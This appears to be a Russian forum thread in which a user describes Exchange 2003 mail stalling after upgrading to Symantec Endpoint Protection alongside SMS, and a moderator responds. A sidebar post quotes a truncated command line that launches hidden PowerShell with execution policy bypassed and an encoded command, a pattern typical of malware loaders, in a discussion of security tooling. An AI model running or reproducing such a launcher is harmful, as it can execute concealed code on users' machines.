Перейти к содержанию
yukho

Symantec Endpoint Protection

Recommended Posts

yukho

Была система на Win2003 - Ms Exchange 2003, SMS 5.0 + SAV 10. Обновили SAV до SEP 11.0.2010.25 с сохранением политик. Итог - после перезагрузки сервера встала очередь в Exchange (письма не попадали в хранилище). Остановка служб SEP не помогла, более - его удаление тоже не помогло, пришлось удалять и SMS.

Есть ли какие-то ограничения использования такого сочетания антивирусов? Обязательно нужно обновляться до 6-ой версии SMS? (да и в этом ли проблема)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Кирилл Керценбаум

yukho известных проблем по несовместимости продуктов нет. После чего проблема решилась?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
yukho
yukho известных проблем по несовместимости продуктов нет. После чего проблема решилась?

Удалили SEP и SMS. Ибо после удаления только SEP и перезагрузки проблема сохранилась. Хотя на другом сервере SMS 6 + SEP работает пока нормально.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Кирилл Керценбаум
Удалили SEP и SMS. Ибо после удаления только SEP и перезагрузки проблема сохранилась. Хотя на другом сервере SMS 6 + SEP работает пока нормально

Очень странно. Рекомендую в следующий раз не мучиться самостоятельно, а сразу писать в ТП

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×